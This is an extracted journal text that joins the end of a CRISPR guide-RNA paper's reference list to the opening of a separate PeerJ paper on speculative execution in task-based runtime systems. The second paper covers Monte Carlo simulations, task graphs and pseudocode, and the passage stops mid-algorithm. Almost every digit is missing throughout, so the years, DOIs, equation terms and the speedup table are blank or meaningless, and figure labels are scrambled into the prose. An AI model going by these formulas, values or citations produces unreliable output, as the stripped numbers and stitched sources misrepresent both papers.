eh, weissman js, qi ls, huang b. . dynamic imaging of genomic loci in living human cells by an optimized crispr/cas system. cell : – doi . /j.cell. . . . deltcheva e, chylinski k, sharma cm, gonzales k, chao y, pirzada za, eckert mr, vogel j, charpentier e. . crispr rna maturation by trans-encoded small rna and host factor rnase iii. nature : – doi . /nature . doudna ja, charpentier e. . the new frontier of genome engineering with crispr-cas . science : doi . /science. . farboud b, meyer bj. . dramatic enhancement of genome editing by crispr/cas through improved guide rna design. genetics : – doi . /genetics. . . gratz sj, ukken fp, rubinstein cd, thiede g, donohue lk, cummings am, o’connor- giles km. . highly specific and efficient crispr/cas -catalyzed homology-directed repair in drosophila. genetics : – doi . /genetics. . . heigwer f, kerr g, boutros m. . e-crisp: fast crispr target site identification. nature methods : – doi . /nmeth. . hsu pd, lander es, zhang f. . development and applications of crispr-cas for genome engineering. cell : – doi . /j.cell. . . . jiang f, doudna ja. . the structural biology of crispr-cas systems. current opinion in structural biology : – doi . /j.sbi. . . . kim s, kim d, cho sw, kim j, kim j-s. . highly efficient rna-guided genome editing in human cells via delivery of purified cas ribonucleoproteins. genome research : – doi . /gr. . . lawrence m, huber w, pagès h, aboyoun p, carlson m, gentleman r, morgan mt, carey vj. . software for computing and annotating genomic ranges. plos computational biology :e doi . /journal.pcbi. . liu h, wei z, dominguez a, li y, wang x, qi ls. . crispr-era: a comprehensive design tool for crispr-mediated gene editing, repression and activation. bioinformatics ( ): – doi . /bioinformatics/btv . makarova k, grishin n, shabalina s, wolf y, koonin e. . a putative rna-interference-based immune system in prokaryotes: computational analysis of the predicted enzymatic machinery, functional analogies with eukaryotic rnai, and hypothetical mechanisms of action. biology direct : doi . / - - - . mali p, esvelt km, church gm. . cas as a versatile tool for engineering biology. nature methods : – doi . /nmeth. . mojica fjm, dı́ez-villaseñor c, garcı́a-martı́nez j, almendros c. . short motif sequences determine the targets of the prokaryotic crispr defence system. microbiology : – doi . /mic. . - . montague tg, cruz jm, gagnon ja, church gm, valen e. . chopchop: a crispr/cas and talen web tool for genome editing. nucleic acids research :w –w doi . /nar/gku . roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /science. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /science. http://dx.doi.org/ . /genetics. . http://dx.doi.org/ . /genetics. . http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /mic. . - http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /peerj-cs. naito y, hino k, bono h, ui-tei k. . crisprdirect: software for designing crispr/cas guide rna with reduced off-target sites. bioinformatics : – doi . /bioinformatics/btu . r core team. . r: a language and environment for statistical computing. . . edition. r foundation for statistical computing. ran fa, hsu pd, lin c-y, gootenberg js, konermann s, trevino ae, scott da, inoue a, matoba s, zhang y, zhang f. a. double nicking by rna-guided crispr cas for enhanced genome editing specificity. cell : – doi . /j.cell. . . . ran fa, hsu pd, wright j, agarwala v, scott da, zhang f. b. genome engineering using the crispr-cas system. nature protocols : – doi . /nprot. . . roberson e. . homo sapiens cuts per gene annotated for prime gg motif grnas—exhaustive scan. available at http://dx.doi.org/ . /m .figshare. . shirley m, ma z, pedersen b, wheelan s. . efficient “pythonic” access to fasta files using pyfaidx. peerj preprints :e doi . /peerj. . stemmer m, thumberger t, del sol keyer m, wittbrodt j, mateo jl. . cctop: an intuitive, flexible and reliable crispr/cas target prediction tool. plos one :e doi . /journal.pone. . xiao a, cheng z, kong l, zhu z, lin s, gao g, zhang b. . casot: a genome-wide cas /grna off-target searching tool. bioinformatics : – doi . /bioinformatics/btt . xie y. . dynamic documents with r and knitr. boca raton: chapman and hall/crc. xie k, minkenberg b, yang y. . boosting crispr/cas multiplex editing capability with the endogenous trna-processing system. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . roberson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /nprot. . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. identification of high-efficiency 'gg grna motifs in indexed fasta files with ngg introduction materials & methods ngg motif identification multi-species site identification results 'gg grna sites are common in each species little strand bias observed for canonical 'gg grna sites cgg & ggg pam sites are underrepresented most protein coding genes overlap at least one unique 'gg grna discussion acknowledgements references submitted december accepted february published march corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright bramas distributed under creative commons cc-by . open access increasing the degree of parallelism using speculative execution in task-based runtime systems bérenger bramas camus team, inria nancy—grand est, illkirch-graffenstaden, france abstract task-based programming models have demonstrated their efficiency in the develop- ment of scientific applications on modern high-performance platforms. they allow delegation of the management of parallelization to the runtime system (rs), which is in charge of the data coherency, the scheduling, and the assignment of the work to the computational units. however, some applications have a limited degree of parallelism such that no matter how efficient the rs implementation, they may not scale on modern multicore cpus. in this paper, we propose using speculation to unleash the parallelism when it is uncertain if some tasks will modify data, and we formalize a new methodology to enable speculative execution in a graph of tasks. this description is partially implemented in our new c++ rs called spetabaru, which is capable of executing tasks in advance if some others are not certain to modify the data. we study the behavior of our approach to compute monte carlo and replica exchange monte carlo simulations. subjects distributed and parallel computing keywords stf, monte-carlo, speculation, task-based introduction parallel cpus are now everywhere, from mobile phones to high-performance computing nodes. to efficiently use this type of architecture, it is necessary to design applications to execute in parallel. this parallelization can be done in many ways with different paradigms. among them, the task-based approaches have demonstrated successful exploitation of the parallelism of an algorithm by simply using the real dependencies between the data. in turn, the division of the algorithm into tasks cannot use dependencies at a low level, such as the instruction level, because of the runtime and context management overheads but has to instead find the appropriate granularity to balance between the degree of parallelism and chunk of work. using task-based methods, it is possible to dissociate the parallelization algorithm from the rest of the code, composed of computational kernels and data structure definitions, but also from the hardware. this is intended to reduce issues coming from management of parallelization but also to avoid re-writing the application due to hardware changes. the complexity is then in the runtime system (rs), which is in charge of managing the execution, the distribution of the work, and the coherency. this also gives opportunities for specialists in scheduling or concurrent programming to improve these layers with a possible direct impact on the applications on the top. how to cite this article bramas b. . increasing the degree of parallelism using speculative execution in task-based runtime systems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. on the other hand, the features and expressiveness of each rs can be different, and some very specific features could be needed for certain classes of algorithms. this was the starting point of our work while developing monte carlo (mc) and replica exchange monte carlo (remc) algorithms for protein simulations. the description using tasks and dependencies of these algorithms gives a low degree of parallelism. however, some write dependencies are actually not true because a task might ultimately not modify the data, but this cannot be known in advance. this motivated us to look to the side of speculative execution, with a primary objective of improving the scalability of the mc/remc algorithms. secondary objectives are to get a generic pattern/method to use speculation in task-based rs’s and to use only features that already exist in most task-based rs’s (tasks). the main contributions of our study are the following: • describe a general approach to include speculation in task-based rs’s. • detail a possible implementation of this new strategy. • introduce spetabaru, a new task-based rs capable of speculation. • illustrate how speculation can speed up mc and remc simulations. the current paper is organized as follows. in ‘motivation example: monte carlo simulations’, we describe the mc and remc simulations and discuss how they are usually parallelized as a motivation to our work. ‘background’ introduces the notions related to rs’s and speculative executions. ‘speculation in task-based runtime systems’ describes our new strategy and how it can be implemented in a regular task-based rs. finally, ‘performance study’ presents a performance study for executing mc and remc simulations with speculation. motivation example: monte carlo simulations the mc method is widely used in simulations of physical systems, especially when there are many coupled degrees of freedom that make traditional approaches inefficient or too expensive. among this large class of solvers, we focus on the monte carlo simulations that use the metropolis–hastings update. we refer to the studies in protein simulation (see thachuk, shmygelska & hoos, ; kim & hummer, ) to illustrate more precisely the type of problem we focus on. let us consider a system composed of multiple groups of beads/particles called domains. a domain can be a peptide in studies that focus on biomolecules in an all-atom approach. the energy of the system is a quadratic pair-wise computation between all particles in the system. a domain can move, that is, it can rotate, shift, or even redistribute its particles in space, which leads to a recomputation of the energy. the objective of such a problem generally is to find the configuration, meaning the position of the domains/beads, with the lowest energy. in the corresponding algorithm, a single stochastic process evaluates the energy of the system and accepts/rejects updates based on the temperature t. this t influences the probability for a change to be accepted, and with a high temperature the updates are more likely to be accepted. the mc simulation method is shown in algorithm . at line , the energy is computed for the default configuration. then, for a given number of iterations, bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the algorithm uses the domains and updates them (see line ). it continues by computing the new energy with this domain that moved at line . at line , we use the metropolis formula to decide, based on the energy difference and temperature, if the change has to be accepted. in case it is, we keep the change by replacing the old domain’s position with the new one (see line ). algorithm : monte carlo simulation algorithm. function mc(domains, temperature) // compute energy (particle to particle interactions) energy← compute_energy(domains) mc_core(domains, temperature, energy) function mc_core(domains, temperature, energy) // iterate for a given number of iterations for iter from to nb_loops_mc do for d in domains do // move a domain and compute new energy new_d←move(temperature, d) new_energy←update_energy(energy, new_d, domains) // accept the move (or do nothing) if random_ ()≤metropolis(new_energy, energy, temperature) then domains← replace(domains, d, new_d) energy←new_energy end end end replica exchange monte carlo simulation (remc) the mc algorithm might get trapped in local minimums or miss all local minimums, depending on t. the idea of the remc, also known as parallel tempering, is to run several mc simulations of the same system, but each with a different temperature. consequently, the acceptance rate and the speed of changes are very different for each of them. then, at defined iterations, the simulations are exchanged, again using the metropolis formula. therefore, simulations that run at high temperatures and where modifications were easily accepted will then run at a lower temperature. algorithm contains the different steps to be done with n different replicas/temper- atures. at line , we compute the energy for all randomly initialized systems. then, the algorithm iterates for a given number of times and first performs a call to the mc algorithm for each configuration, line . second is an exchange stage between configurations, starting at line . it is common that the exchange_list is designed such that the exchange happens between odd–even pairs of simulation when iter is odd and even–odd otherwise. parallelization of mc and remc the data dependencies for both the mc and remc algorithms are easy to extract. in the mc algorithm, each iteration depends on the previous one. the changes are only dependent over the domain, but to compute a new energy we have to know if the change of the previous domain has been accepted or not. consequently, the only parallelism that can be applied is inside the computation of the energy, possibly with a fork-join strategy. the same is true for the remc, with the difference that the calls to the n different mc simulations can be done in parallel. therefore, it is common to use one thread or one process per replica. in altekar et al. ( ), the authors proposed a point-to-point exchange bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : replica exchange monte carlo (parallel tempering) simulation algorithm. function remc(domains[n], temperature[n]) // compute energy (particle to particle interactions) for s from to n do energy[s]← compute_energy(domains[s]) end // iterate for a given number of iterations for iter from to nb_loops_remc do for s from to n do // compute usual mc for each simulation mc_core(domains[s], temperature[s], energy[s]) end // compare based on a given strategy for s in exchange_list(iter) do // use the energy difference between s and s+ to decide to exchange them if random_ ()≤metropolis(energy[s] - energy[s+ ], temperatures[s]) then swap(domains[s], domains[s+ ]) swap(energy[s], energy[s+ ]) end end end scheme. they distributed n replicas among p processes and ensured that there was no global barrier; in other words, only the processes that have to exchange simulations communicate. the same principle applies in zhou et al. ( ) with one process per temperature/replica. similarly, in gross, janke & bachmann ( ), the authors dedicated one thread or one gpu per replica. finally, in treikalis et al. ( ), the authors proposed a parallel framework for plugging in mc-based applications. they also remind that asynchronous re (so without a global barrier) is needed in many cases. however, no matter how efficient the implementation, synchronizations between the domains in the mc and the replicas in the remc must be done. but it appears clear that these dependencies are sometimes not needed when the changes are rejected because the data are left unchanged, so it could be possible to compute in advance, hoping that the result will not be invalid. the main part of the current study is to provide a system for this compute-in-advance on top of an rs. background task-based parallelization most hpc applications that support shared-memory parallelization rely on a fork-join strategy. such a scheme uses a simple division of the work into independent operations and a global barrier that ensures all the work is done before the execution continues. the most common feature is the for-loop parallelization using pragmas as proposed by the openmp (openmp architecture review board, ) standard. this model has been extended to a tasks-and-wait scheme, where operations come from different parts of the application but are still independent. the task model from openmp (openmp architecture review board, ; ayguadé et al., ) and the task-based programming language cilk (blumofe et al., ) (later extended in cilk++ (leiserson, ) and cilk plus (intel, )) follow this idea. this is still a fork-join model because successive spawn phases of independent tasks (fork) must be explicitely synchronized (join) to ensure a bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. correct execution. this really limits the scalability because of the waiting time and the imbalance between tasks. developers are able to increase the degree of parallelism by using multiple sources of tasks that they known are independent. but then it starts to become manual management of the dependencies, which a modern task-based rs is intended to do. an algorithm can be decomposed in interdependent operations where the output of some tasks is the input of others. a task-based implementation will map tasks over these operations and create dependencies between them to ensure execution coherency. the result can be seen as a direct acyclic graph (dag) of tasks, or simple graph of tasks, where each node is a task and each edge is a dependency. an execution of such a graph will start from the nodes that have no predecessor and continue inside the graph, ensuring that when a task starts, all its predecessors have completed. the granularity of the tasks, that is, the content in terms of computation, cannot be too fine-grained because the internal management of the graph implies an overhead that must be negligible to ensure good performance, as shown in tagliavini, cesarini & marongiu ( ). therefore, it is usually the developer’s responsibility to decide what a task should represent. the granularity is then a balance between the degree of parallelism and the rs overhead. for that reason, several researches are conducted to delegate partially or totally the rs system to the hardware with the objective of relieving the worker threads, as in chronaki et al. ( ). building a graph of tasks can be done in two major ways. the first possibility is to build a graph by creating the nodes and connections between them explicitly, as it is used in the parametrized task graph (ptg) model (cosnard & loi, ). this approach is complex and usually requires completely rewriting an application. the second method is the sequential task flow (stf) (agullo et al., b). here, a single thread creates the tasks by informing the rs about the access of each of them on the data. the rs is then able to generate the graph and guarantee that the parallel execution will have the absolute same result as a sequential one. this ends in a very compact code with few modifications required to add to an existing application by moving the complexity in the rs. in our work, we use the stf model. there now exist numerous different task-based rs’s. the most popular ones are implementations of the openmp version (openmp architecture review board, ) standard that defines the additional pragma keyword depend to inform the rs about the type of data accesses performed by the tasks. however, using pragmas, in general, is tedious when a task has hundreds of dependencies or when the number of dependencies are known at runtime, because it ends up being an ugly and error-prone code. in addition, as openmp is a standard, it is upgraded slowly to ensure backward compatibility. moreover, the standard is weak in the sense that it does not impose any constraints on the implementation and complexity of the underlying algorithms. this can cause performance surprises for the user when compared to different openmp rs’s. nonetheless, its portability, stability, and maturity make it a safe long-term choice. additionally, some industrial rs’s have been defined, such as the intel threading building blocks (itbb), c++ library (intel, b). it allows building of graphs using the ptg model, but it also supports various other features such as memory allocation management and parallel containers. parsec (danalis et al., ) is another rs based on bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the ptf model that had been demonstrated to be effective in various scientific applications. charm++ (kale & krishnan, ) is a c++-based parallel programming system. it includes the parallelism by design with a migratable-objects programming model, and it supports task-based execution. smpss (perez, badia & labarta, ), now included in ompss (duran et al., ), is a rs based on the stf model that defined what later became the openmp tasks. it uses pragmas annotation to inform the rs about data access by the tasks. starpu (augonnet et al., ) is an rs that was first designed to manage heterogeneous architectures. it is a c library such that the user has to use low-level programming and function pointers. however, it is extremely flexible and it is capable of having distributed memory stf. xkaapi (gautier et al., ) is an rs that can be used with standard c++ or with specific annotation but which needs a given compiler. legion (bauer et al., ) is a data-centric programming language that allows for parallelization with a task-based approach. superglue (tillenius, ) is lightweight c++ task-based rs. it manages the dependencies between tasks using a data version pattern. most of these tools support a core part of task-based rs, such as creating a graph of tasks (even if it is implemented differently) where tasks can read or write data. however, scheduling is an important factor in the performance (agullo et al., a), and few of these rs’s propose a way to create a scheduler easily without having to go inside the rs’s code. moreover, specific features provide mechanisms to increase the degree of parallelism. for instance, some rs’s allow specification of whether data access is commutative, meaning that the tasks write data but the order is not important. this kind of advanced functions can make a big difference in terms of performance (agullo et al., ). we refer to thoman et al. ( ) for a more in-depth comparison of the rs’s. to the best of our knowledge, none of them propose a speculation system. but any of the stf based rs could easily implement our strategy to use speculation. speculative execution speculation is the principle of guessing without being certain in order to make a profit. it is commonly used at the instruction level in cpu hardware to fill the pipeline of instruction when there is a branch, to prefetch the memory, to manage the memory dependence, and to use transactional memory. in our system, the speculation is at the application level, or more precisely, at the task level. therefore, it has very different constraints, advantages, and disadvantages compared to hardware-based speculation. on the other hand, it requires managing copies and synchronizations at a high level, too. the two main speculation strategies are called eager and predictive. eager execution computes all paths, and this is usually not realistic because there are too many of them and because the real path may actually be found only once the results are known. predictive execution is the more common strategy; in this model, the execution follows a path until we know if the prediction is true. a common speculation pattern is called thread level speculation (tls). in steffan & mowry ( ), the authors describe how tls was expected to improve parallel performance of non-numeric applications. the idea is to mimic the instruction speculation by the compiler by, for example, reordering instruction to move a load ahead of a store. at bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure graph of four tasks where b is task that will potentially modify the data. full-size doi: . /peerjcs. /fig- execution time, if the speculation appears unsafe, a recovery method should be used. tls is somewhat similar, but the load and store are performed by two different threads. a speculation is then safe if the execution of a load does not target a location that will be modified by a store, which should have already been done. the main problems are to provide a system to control the safety at low costs and how the compiler can automatically insert speculative code. consequently, many researchers have defined new hardware that would make the tls or a similar pattern possible, such as in jeffrey et al. ( ). but many of these research projects are tied to the manufacturer’s choices. in salamanca, amaral & araujo ( ), the authors discuss how instructions that currently exist in most cpus to manage transactional memory (tm) could be used to implement tls. they show that tls is already possible but that false-sharing, coming from the size of the element the tm instructions are working on, can significantly decrease the performance. other speculation methods have been proposed with pure software approaches. for example, the apollo (apollo, ) framework is capable of speculative parallelization processes for loops of any kind (for, while, or do-while loops). it is composed of two main layers. first, an extensions to the clang-llvm compiler prepares the program by generating several versions of each target loop nest and several code snippets called code bones (martinez caamaño et al., ). during the execution, the rs orchestrates the execution of the different code versions by chunks. our approach is different; because it is high level and not designed for a few instructions, it does not require special hardware instruction, and it is designed for applications that are already parallel at the top of a graph of tasks. speculation in task-based runtime systems description consider a simple graph of tasks as shown in fig. where four tasks access the same data. here, task b may or may not write data, but to ensure a correct execution, we must use write data access, and so the dependency between b and c is strict. in our approach, we allow the programmer to indicate that a task will potentially write data, that is, there is a condition in the task that will make the modification effective or not. then, at the end of the task’s execution, this one informs the rs to detail whether or not the data was modified. in doing this, the rs knows that speculation is possible, and it can create extra tasks as shown in fig. . when an uncertain task (a task with at least one potential write) is inserted, the rs creates a copy-task in front of it, a speculative task and a select task. at runtime, if the speculation is enabled, the rs has to manage them to bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure graph of four tasks where b is an uncertain task. extra tasks are created by the rs: copy, c’ and select. full-size doi: . /peerjcs. /fig- b ca copy dselect c’ disable try to disable enable a: if b wrote on the data, the rs tries to cancel c’, it enables c and disables the select. b ca copy dselect c’ disable enable b: if b did not write on the data, the rs disables c and enables the select. figure graph of four tasks where b is an uncertain task and with speculation enabled. when b is over the rs update the next tasks, in (a) if b did write on the data, and in (b) otherwise. full-size doi: . /peerjcs. /fig- ensure accuracy and coherency. in our example, when the speculation is enabled, both b and c’ can be computed concurrently. then, there are two possibilities, either b modified the data or it did not. if it did, as shown by fig. a, then the result of c’ is invalid and will be destroyed. in addition, the valid result from b used by c will have to be computed, and we can disable the select task. otherwise, as shown in fig. b, in the case where b did not write data, then the output of c’ is valid. c is disabled, and the select task is enabled to ensure that the valid result is used as output of this group of tasks. in terms of execution time, without speculation, we have the total duration d = d(b) + d(c). with speculation and if b writes data, then d = d(copy) + max(d(b) + d(c), d(c’)), considering that c’ is computed at the same time as b and c and where d(c’) is zero if canceled. with speculation and if b does not write data, then d = d(copy) + max(d(b),d(c’)) + d(select). the creation of the extra tasks can be done at the time of insertion, and thus, it does not require any specific feature from the rs. however, it implies a possible overhead since the creation of a task usually requires multiple allocations and possible synchronizations in the scheduler. the enabling and disabling of the tasks during execution do not mean that the task has to be removed from the dag but that their core part should act as an empty function. the select tasks are functions to act as a switch and to decide which data are the valid output. for instance, in the given example, if x is the original value accessed by the tasks and x’ the copy of x accessed by c’, the select code would be x = x’. therefore, we only have to enable the select task when we want to overwrite x by the output of c’. bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b c d e a: normal dag. b ca copy dselect e copy c’ select b: if c uses the data from e in write, an extra copy and select are needed. b ca copy dselect e c’ c: if c uses the data from e in read nothing special is needed. figure graph of five tasks where b is an uncertain task and where c, the task use for speculation, uses data from another task e. full-size doi: . /peerjcs. /fig- a b c d e f a: original dag. b c a copy d select c’ fe copy select b: dag if c write on both data used by b and f. figure graph of six tasks where b and f are non consecutive uncertain tasks. full-size doi: . /peerjcs. /fig- a b c d e f a: original dag. b c a copy dselect c’ e fselect e’ copy b: graph when both c and e write on the data potentially used in b. b c a d c’ e f e’ copy c: graph when both c and e read on the data potentially used in b. figure graph of six tasks where b is an uncertain task. full-size doi: . /peerjcs. /fig- the decision to activate the speculation can be done at runtime, and the extra tasks should simply be disabled if the speculation should not happen. multiple dependencies more advanced examples are shown in figs. , , and . they show how the rs should act to speculate but still have valid and coherent execution. in fig. , task c uses data from a normal task e in addition to that from the uncertain task b. therefore, if c writes data from e, c’ does so as well. since we do not know if c’ will be valid, we have to insert an extra copy, as shown in fig. b. an additional select is also needed to select the correct data from c or c’ as the output of the task group. otherwise, if the data from e is used in reading by c, then both c and c’ can use the same data concurrently, as shown in fig. c. bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. speculative task group (stg) in fig. , we provide an example where we have more than one uncertain task but not consecutively. in this case, we need to copy all data that could be modified by the uncertain tasks b and f, and we need one select for each of them. however, there is a very important aspect here because b and f might not have the same behavior, and as a result, one could write the data while the other does not. therefore, in our approach, we link together all the tasks that are connected inside an stg. if at least one uncertain task of the group modifies the data, then the speculation has failed no matter the result of the other uncertain tasks. it could be more fine-grained, but that would require a complex algorithm to ensure coherent progression in the dag. in the given example, if b or f modifies the data, then the rs tries to cancel c’, enable c, and disable the selects. an stg also links the tasks used for speculation. as an example, in fig. , the uncertain task b may or may not write data at two different points. one of the two is later used by c, and the other one is later used by e. here, we consider only two cases; when c and e write data, see fig. b, and when they use those data in read, fig. c is used. in the first case, when b fails, the rs tries to cancel c’ and e’, enable c and e, and disable the select, while in the second case, there is no need to have a select. in our case, an stg is composed of several lists: the list of copies tasks, the list of uncertain tasks, the list of original speculative tasks, the list of speculative tasks, and the list of selects. at runtime, based on the result, the lists have to be properly managed to ensure a correct execution. the decision to enable the speculation in a task group can be done when the first copy task is ready. since the construction of all this information is done at task insertion time, there is also the need to merge different task groups, which is simply a merge of the list, or an extra list that contains the other groups. multiple consecutive uncertain tasks it could happen that several uncertain tasks are consecutive (directly connected in the graph). there are several ways of managing such a configuration, and fig. shows four of them. in fig. a, we leave everything unchanged compared to the previous examples, but then it appears that d could speculate over c. in fig. b, we show that we could perform the speculation above all the uncertain tasks. therefore, here, we let the consecutive uncertain tasks compute one after the other. however, with this approach, the degree of parallelism remains two no matter the number of uncertain tasks. in fig. c, we mix the speculation above b and c. here, the degree of parallelism is three because c’, c, and d’ can be computed concurrently. however, again, if there are more than three uncertain tasks, the degree will remain the same. finally, what we use is shown in fig. d. here, (b,c), c’, and d’ can be computed concurrently, and the degree of parallelism will increase with the number of uncertain tasks. speedup for one or multiple consecutive uncertain tasks the expected speedup is, of course, a matter of probability depending on the success rate of the speculation. for instance, let us consider that we have n consecutive uncertain tasks bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. b ca copy dselect c’ e a: alternative : no speculation is done on c. b ca copy d e d’ select b: alternative : task d speculates above b and c. b ca copy dselect c’ e d’ selectcopy c: alternative : speculation is used successively on each uncertain task. b ca copy dselect c’ e d’ select copy d: alternative : multiple speculation paths are used. figure graph of four tasks where b and c are tasks that will potentially modify the data. full-size doi: . /peerjcs. /fig- followed by a normal task all of the same cost t, negligible copies/selects, and at least n available workers. the speedup will be, on average, s= (n + )×t (n + )×t−dn ( ) dn = n∑ i=  t×i×pi+ × i∏ j= ( −pj)   ( ) pn+ = ( ) where dn is the average duration gain, and pi is the probability for the task of index i to write data. in eq. ( ), we compute dn with a sum over the average gain when each of the uncertain tasks write data. for instance, when task i+ writes data but all its predecessor tasks do not, we obtain an average gain of i×t with a probability of pi+ × ∏j≤i j= ( −pj). in eq. ( ), pn+ is set to because the definition specifies that the (n + )th task is a normal task that always writes on the data. if the probability is / for all uncertain tasks, then we have: d / = t× ( n− ∑ i= ( i i+ ) + n n ) . ( ) we provide the speedup in table , if we consider an execution as a unit with t = and we have n uncertain tasks followed by one normal task. multiple consecutive uncertain tasks (eager extension) our objective that is not yet implemented in our rs is presented in fig. . here, we create all the tasks necessary to be able to restart the speculation process when it fails. however, it requires the creation of (n +n)/ −n speculative tasks, with n being the number of consecutive uncertain tasks, plus the copy and select tasks. many of these tasks will be disabled by default and enabled only when a speculation fails. however, in terms of performance, any non-modification of the result provides a benefit of t. therefore, the average duration gain f(n) is given by bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table gain in time d (percentage of one task) and speedup when the probability of invalid specula- tion is either / , / or / . n d / . . . . . . . s / . . . . . . . d / . . . . . . . s / . . . . . . . d / . . . . . . . s / . . . . . . . b ca copy d select c’ e d’ select copy d’’ copy select figure graph of four tasks where b and c are uncertain tasks. extra tasks are created by the rs: c’, d’, d’’ and several copies/selects. full-size doi: . /peerjcs. /fig- f(n)=f(n − )×pn +(f(n − )+t)×( −pn ) ( ) =f(n − )+t×( −pn ) ( ) f( ) = . ( ) where pi is the probability for the task of index i to write data. in eq. ( ), we compute f(n) by summing first the gain when task n writes data, which happens with a probability pn , and second the gain when task n does not write data, which happens with a probability −pn . the formula is recursive and can be rewritten by f(n)= t× n∑ i= −pi. ( ) another way to describe this formula is to consider that if we have n uncertain tasks, we first compute task and speculate over it with duplicate of tasks from to n . if tasks i writes data, then we will have to compute task i+ and speculate over it with duplicate of tasks from i+ to n . we do so until no tasks write data or the n th is computed. the average speedup is given by s= (n + )×t (n + )×t−f(n) . ( ) bramas ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. for a probability of / for all uncertain tasks, the average speedup is then equal to no matter the number of consecutive speculative tasks. changing the dag on the fly from the execution shown in fig. , the question can be asked if the behavior could be different when c’ is over before b. it would be interesting to speculate for d, too, by creating a task d’ and the corresponding copy and select. however, we have decided not to do so because it requires modifying the dag on the fly. this is a difficult operation to implement and one that most rs’s do not support. algorithm : uncertain task insertion. function insert_uncertain_task(t) // clean the duplicate data handles if one is used in read mode and it is used by t not in read mode global_duplicates.clean_if_in_read(t.data in read) // find the spec-groups related to t, groups groups← global_duplicates.find_spec_groups(t.data) if one of them is disabled or groups is empty then // remove the duplicates related to t (not the one just inserted) global_duplicates.remove_any_kind(t.data) // duplicate the data used by t in maybe-write, list l l ← create_duplicate(t.data in maybe-write) // insert t without speculation internal_insert(t) // add l to the global list global_duplicates.append(l ) // create a new group g← create_group_with_no_parent() g.set_main_task(t) end else // duplicate the data used by t in maybe-write, list l l ← create_duplicate(t.data in maybe-write) // create a new group with groups as parents g← create_group_with_parents(groups) g.add_copy_tasks(l .copy_tasks) // duplicate the data used by t in maybe-write that are already duplicated (list l p) (inform g) l p← create_duplicate(t.data in maybe-write and exist in global_duplicates) g.add_copy_tasks(l p.copy_tasks) // duplicate the data used by t in write that are not already duplicated (list l ) (inform g) l ← 